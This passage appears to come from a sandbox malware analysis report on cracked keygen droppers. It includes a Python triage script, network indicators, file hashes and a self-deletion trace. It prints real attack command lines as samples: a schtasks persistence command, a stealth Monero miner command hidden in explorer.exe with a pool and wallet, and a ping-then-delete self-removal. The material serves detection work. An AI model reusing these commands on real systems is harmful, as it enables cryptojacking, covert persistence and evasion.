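    """A system-binary name (optionally with a numeric suffix) running outside the Windows directory."""
    path, stem = image_path(cmdline), image_stem(cmdline)
    if stem in SYSTEM_NAMES and not path.lower().startswith("c:\\windows\\"):
        return {"rule": "system_name_outside_windows", "image": path, "mimics": stem + ".exe"}
    return None


def triage(cmdlines):
    findings = []
    for line in cmdlines:
        for check in (check_schtasks, check_miner, check_lookalike):
            hit = check(line)
            if hit:
                findings.append(hit)
    return findings


# Command lines copied from the behavioral8 process list above.
SCHTASKS_VIA_CMD = r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit'''
SCHTASKS_DIRECT = SCHTASKS_VIA_CMD.split("/c ", 1)[1].rsplit(" & exit", 1)[0]
MINER_CMDLINE = (
    r"C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 "
    r"--randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 "
    r"--url=xmr-eu2.nanopool.org:14433 "
    r"--user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password "
    r"--pass= --cpu-max-threads-hint=30 "
    r'--cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" '
    r"--cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth"
)
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"',
    r"C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4612 -ip 4612",
    SCHTASKS_VIA_CMD, SCHTASKS_DIRECT,
    r'"C:\Users\Admin\AppData\Roaming\services64.exe"',
    r'"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"',
    MINER_CMDLINE,
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINES):
        print(finding)
```

Run against the sample list this yields two schtasks hits (the cmd.exe wrapper and the schtasks.exe child both carry the full command), two lookalike hits, and one miner hit whose pool is xmr-eu2.nanopool.org:14433 and whose wallet validates as a Monero address; the WerFault.exe and keygen-step-4.exe lines produce nothing. The lookalike rule deliberately stays silent for C:\Windows\explorer.exe: that process is caught by the miner rule's hosted_in_system_image flag instead, which is the hollowing signal.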

Network

Country Destination Domain Proto
(identical rows collapsed, counts in parentheses; live.goatgame.live, staticimg.youtuuee.com and qwertys.info were each re-queried dozens of times across the run and are listed once)
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp (repeated throughout the run)
US 8.8.8.8:53 qwertys.info udp (repeated throughout the run)
US 8.8.8.8:53 remotenetwork.xyz udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 startupmart.bar udp
RU 186.2.171.3:80 186.2.171.3 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 best-supply-link.xyz udp
US 8.8.8.8:53 2no.co udp (x2)
US 8.8.8.8:53 staticimg.youtuuee.com udp (repeated throughout the run)
RU 186.2.171.3:443 186.2.171.3 tcp
US 172.67.149.76:443 2no.co tcp (x2)
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 3.171.2.186.in-addr.arpa udp
US 8.8.8.8:53 76.149.67.172.in-addr.arpa udp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
UA 194.145.227.161:80 tcp (x7, no hostname)
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 104.21.79.229:443 2no.co tcp
SG 37.0.10.214:80 tcp
US 8.8.8.8:53 229.79.21.104.in-addr.arpa udp
SG 37.0.10.244:80 tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 163.172.171.111:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp (x2)
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 54.37.232.103:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 111.171.172.163.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 103.232.37.54.in-addr.arpa udp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/3944-33-0x00000000727CE000-0x00000000727CF000-memory.dmp

memory/3944-34-0x0000000000DF0000-0x0000000000FC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

memory/1772-57-0x00000000004B0000-0x00000000004C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

memory/636-61-0x0000000000690000-0x00000000006B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/3872-73-0x00000000001D0000-0x00000000001D8000-memory.dmp

memory/636-79-0x0000000000E40000-0x0000000000E5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/3128-96-0x0000000000400000-0x0000000000667000-memory.dmp

memory/3128-103-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4612-102-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/1772-109-0x00000000013B0000-0x00000000013C2000-memory.dmp

memory/1772-108-0x0000000000E50000-0x0000000000E5E000-memory.dmp

memory/3128-118-0x0000000003BF0000-0x0000000003C00000-memory.dmp

memory/3128-112-0x0000000003A90000-0x0000000003AA0000-memory.dmp

memory/3128-125-0x00000000046A0000-0x00000000046A8000-memory.dmp

memory/3128-126-0x00000000046C0000-0x00000000046C8000-memory.dmp

memory/3128-128-0x0000000004780000-0x0000000004788000-memory.dmp

memory/3128-131-0x0000000004740000-0x0000000004748000-memory.dmp

memory/3128-132-0x00000000048C0000-0x00000000048C8000-memory.dmp

memory/3128-133-0x0000000004B70000-0x0000000004B78000-memory.dmp

memory/3128-134-0x0000000004A70000-0x0000000004A78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 131af893fdda3509c156ba94660781b3
SHA1 3f466bc9954868a5a0b5d9cb075b833f994cb559
SHA256 239b4cbdfe71aa3819e1eee267f89e1a93abeb095e50b34c3ce506f636f9dd7e
SHA512 1f9f37bf2044d48b5b7402b456e78473d7c6d83be5825a25db4390437a520763d59c62500d70686992a17f5a2373364c77e46ec78914e1f521a17344813adf1e

memory/3128-148-0x00000000046C0000-0x00000000046C8000-memory.dmp

memory/3128-135-0x00000000048E0000-0x00000000048E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d7e880e586b9dd277964d93c3f6f884b
SHA1 ee406a37e18b02c0502a9e086d1bc72b088e6da3
SHA256 a1ef8ebc74ddc325e7c58c0fb9fc50d8001d99ab3fb7d1fdefff158571cbfcda
SHA512 3c60fbfebe83debe65ad491b6ddc7464f0cd7e2dbb2ccc1b24b583f53d864fc1ad4a2823488f45ddbd0337028b5a677fa0466bd6bf239ecbb8b9503f995a1d4d

memory/3128-156-0x00000000048E0000-0x00000000048E8000-memory.dmp

memory/3128-179-0x0000000004A10000-0x0000000004A18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 0397f70c5c68aaebb3f53b37dcd26e3a
SHA1 b9b8c300ea402333b2c502c31f9a9d3f19949c43
SHA256 ca9899fcf8b04a34a9def2f9470260911b8fed40256988b1c02125bb2c5a2555
SHA512 d3d62b58cdeeddec2f7ffbb030a4dc24dace785e7a4b74c9ce5d2fc2a3b40b62b593f0f21c3033ef627154ff3e73692ffadd88bf373f0e5799c997b851c4779b

memory/3128-158-0x0000000004A10000-0x0000000004A18000-memory.dmp

memory/3128-171-0x00000000046C0000-0x00000000046C8000-memory.dmp

memory/3128-181-0x00000000048E0000-0x00000000048E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 7a21ab9db1f50f54d69938d418ff2a6a
SHA1 e3415b651b56f5a43bfe719b5bb95d87611d099d
SHA256 5b710dd3610fbcf03d51e4b826e3ee929f0551f23a8b608312679b64488393ed
SHA512 a8436eba37fc4cee57c29aedb75b5f89a8aee2f1fa51779183e7cddc50624ac4dcf1ae705b130c9877731c4ffcba6afa4878a8b6660d27ff72ca661c18cfc071

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d

MD5 96de5522298c8e7f7298caae5c7fa1d4
SHA1 0ae8a20d88d64852d1e609b67e182c3f92a87dde
SHA256 ce43d22061873efd109e129caf60dc93cdc71c42413994f732178248fdd57ee3
SHA512 4a561ab340713dea2db37943ed94d96bab774444bd4f5de84bafbf9e76cf51547403aba8c0f401dc8b8f9c1a02361cf889b2378a21fb5bf242877965de314858

memory/3128-220-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3128-221-0x00000000045A0000-0x00000000045A8000-memory.dmp

memory/3128-229-0x0000000004640000-0x0000000004648000-memory.dmp

memory/3128-233-0x0000000004DC0000-0x0000000004DC8000-memory.dmp

memory/3128-232-0x0000000004640000-0x0000000004648000-memory.dmp

memory/3128-234-0x0000000005070000-0x0000000005078000-memory.dmp

memory/3128-235-0x0000000004F70000-0x0000000004F78000-memory.dmp

memory/3128-236-0x0000000004DD0000-0x0000000004DD8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 7eddb5441f9e3374e4c09e4f9eaec5db
SHA1 e32740697dd2649f72ed4344de1aa4c4611304a3
SHA256 30f7e45c78e5d357306683a5b7b4c3ec9490f2e9c4e8a01d0e52f82daffd6f48
SHA512 0390af46dbc700800045f5c646012616d3063854c8e7c4e2d6d35781a2a60afa08902112734bd1381eb88e83d6578e1b5ffcb641a141c26d42a22d1c6b535881

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 09fd93e3d75dabb0ecfe41a3f97ecd87
SHA1 309493cbe8ae60899cb71a23ba023c0f3ef1368d
SHA256 b8de801b681d04bae5fccb9d45e7e4d634aed8e6b88ba3e61ffd8382a3727af3
SHA512 6311d78fac1918664907694672a32420fd64fe02f730f30a6822bb0269f8847973abd5ae1f4cd2b2dd336935e154dfdd7ee16935f203ae3f2384574fd97bf954

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 1208b1144c765c5da9627174ecc30601
SHA1 1e753f7da36ed81f7895f4de36c9add65dc466f8
SHA256 f32f3530a103c4a7c9245851aaf0fb5125951c8803ae4b329b33ddffd62b32d3
SHA512 6bfcbef84beaced842e67e119b00dc4b2b5aea939d7b0fdd2688a57a09e3523e83e1b225b4980b5b19656f344e4680aa9274626556bc916e5aba394d6151a47e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 6b5b1c58f266f850745cdf074dfba679
SHA1 48c3dc5d762456e50ae8e7c6d7ca692a2e448af8
SHA256 49ffbac4bf8b5565f4be0d66ba142ff156575d2de3570aa7b4820e4e264e0a2d
SHA512 4e41de7249803fae6d861ede30c6c0ca38f9f90e90fc52c40cef4a9ca199cbb913a25f2c89717142210dbd671ed14bd312772d6967be31591eefb1a5c10f5dd5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 1bdad89e14c502647802c7f397b1c445
SHA1 5a28fb09a469509f7cac6c7c4d6f10aeabb1c940
SHA256 7d0daa32d20ffebe431f9760bd079f749117d662272857a1c2b93674b442a42f
SHA512 ea27ba8f4c5394e0fbd2725556b1cc332787c4ed1136ba2cd8381b5858d2fe12c696bc20546f9bf5371c14a941721950d46a1c50210ad7c6391f9d7318e6140e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d4a3285968ecab86d9bdaeddad0f25a2
SHA1 a1d8542429d3f276d4fb0ad5619d09613d9d87b2
SHA256 0461cc6edb9444b1532ae97f8f2c08e08f24816d0da7c318eaa8dc92d1a04a78
SHA512 30f76d9e4d2cf9dc49d8865d0b0cb733cc9d78cff6957125d959487db82acc7d33e303435def46f1c014a6011071c732540e6ae20b35b30df0d002277d391043

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 cacce1ae356771810ccaf23e3f2b5b9d
SHA1 8e6baa63dea4a3b9a5f066479e642a6fbce5d1e8
SHA256 fcd4be44fb83a976735acfab85804138653f0a2b70ebbfa5371abaac9be6f87c
SHA512 328747137b57c323cb8243fa52afa1fb00ef1d9253a7fd7031958805985182f36321e1d991891d24c5eed776dfa59adcfb6a7150974a66a9980f6eab27ae7113

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 704417ba46c5a508ba6181bffe798641
SHA1 055c1d9c2257d65e4a2f9161a6befcdb75470f88
SHA256 d811eccb0bb036f76263f239c6ed4f9e613480c544b7130285afd8a5b5389463
SHA512 f020745e684828cafdba8d68d37fa62e8d18079554baaa2aa5e7af1a9d5942bb3c2ff8b9f924b07e70724a1da608cfb6c9ea0fb991188710e2b7dc85dd2f499d

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d86f9199cb5093b8867e1db3fb965f2c
SHA1 a96c1d7497f9a9cb9934a6ad1e77984355035747
SHA256 cd847288ff5f268c94ac844472cffadafa8285b77b63a21bece93a2c8bb41468
SHA512 e134365cd96eb63e578a637c3536fe9e2edb495d44c84ff5ea3a78a6847914a0eb70f226a743aee17a6defa93cfae98fb0155317a560211d3d0e62c46bd52f4f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 19fbf9968f26f8785d2579d857cdbc6b
SHA1 3f5577adc6a4257af5ca5ec2afdb95191191d06d
SHA256 87dd8ddb32ce855391fb14cda5038cab71e799ec3fa1bbf13edc4e347e9c3453
SHA512 1e033d583f4dfbb2fdc2676ab43ee1a8bc23fac54f3bddc01774c02f5ee2e6086744c0a144bf902d479f0b3fb5b8a6dc219ae9d044c9a8fbe34d1212e7ea80e2

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 3f9892b86e97f6f6672da2aae4f6c2b1
SHA1 e3cbfa966258bb0b7876e22159a84c1779f5bf7d
SHA256 68ea36d2e4a7b07686cb3d5c87df65a0a17619de891d8cf090ee687aabd23b3d
SHA512 f8c82413ab69963d9bddc529bea148290313b5ae7c04dfc62521ea15ab0f62794727793b5d750fc6ac23a9bf965f55b4b2edf0725f32a0500e8ec0eddbe83210

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d8ee8db93a888442a013d2964b936548
SHA1 e6dc9c66aede826aa0fa6d92709c062844a10c8f
SHA256 e27d79774a1ad3f3680d074a98f769744a08563da6257ae113fa3924b8565eb1
SHA512 4c7261d4fd37ad0cb27ce1adc5b7dee0064bc31aa3fefd7ee212f442d9c80445b318f07aa0d7fbcc2b47dfaa37faaa3e27ba02b4df8ea2f80922a29d1751d0df

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 90f342fe9ffbf819e607282a603a7d43
SHA1 bf774edfa7d522772bc5db337e5c2d67f34f2e1d
SHA256 42f2e65c356567d709c6bddcbc768709eeb4612a91c78efc919a79d370126224
SHA512 91dcebc9c4b288d50f815578de95a56af7038fd655390fa19d30dd416901da770e22dfe2bae112bb5c9093ca3b683ae564e3c5b2d227dc5217fc914aaeff7d20

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 4a38907630302671c72ee92d0779f2ab
SHA1 b8cbd7f41137b5540134bd4566b31cae7fa84e08
SHA256 24d2eeeb382dff1c4fd23bbf726674cbc89bbb1d0f5da5a6f5392151f8218cff
SHA512 cc4c161d6a127dffa28957d9850a6f8bc3e3621257e11d0c8219d93c951ed873e291f7978e2cfd1c4636015f37ecec9cd0856448427929b550ad9b355f70838f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 6de20428cd5a450e33d42acc597946d8
SHA1 ccdea1bc0f0b2ff01ed92a27cc3d603631ca420c
SHA256 ce4dabf29b75ff731ed9db5962f838818b7c23cf2efe34e4c39d5b1933868612
SHA512 56110393e9d1f43651cecac4a0d1bdb690c777f5d2389afff1cbcaac3c8831044c9e7880456e66c53e960b19e089dc30f55f1e16c9745a83ed79f58051db1450

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.INTEG.RAW

MD5 0489b6e31348e1ead95f955bc05139ea
SHA1 108d147c84ad6bd223da450f571480705aeda47f
SHA256 a9dc26c0cb9ea7a42d34714b8773b3e33d84d966a88481fdd2e73470ee788d88
SHA512 733161815ed7a2da02319202a5b7b696a976cadfdc066b0226f094eb3fcac66ce1165ac140d754df94ade849dde820f46c5f1ac1d9de8c71f186a1b26a669938

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 5771ea8d5dd037a746905e9ecfc9d24f
SHA1 2255bbe04da92a81a4cbb62dc4d83d8d59a3f4fc
SHA256 841291763cdb3d6fc45928396d5d89688b8da744b8e69e01cbdd33476ccd674a
SHA512 2dd766486b8d8a475cc88215634b560359b8e1e2bafd3d5124bfc1edf3514012126ed55602d4b57d817be730b0a25361921e055e2d2dfcf768215d329dd00032

memory/3128-622-0x0000000000400000-0x0000000000667000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/3256-642-0x0000000000FE0000-0x0000000000FFE000-memory.dmp

memory/3256-643-0x0000000002F40000-0x0000000002F5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/1772-672-0x00000000006B0000-0x00000000006B6000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.30:443 evaexpand.com tcp
GB 89.116.109.30:443 evaexpand.com tcp
GB 89.116.109.30:443 evaexpand.com tcp
GB 89.116.109.30:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.29:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
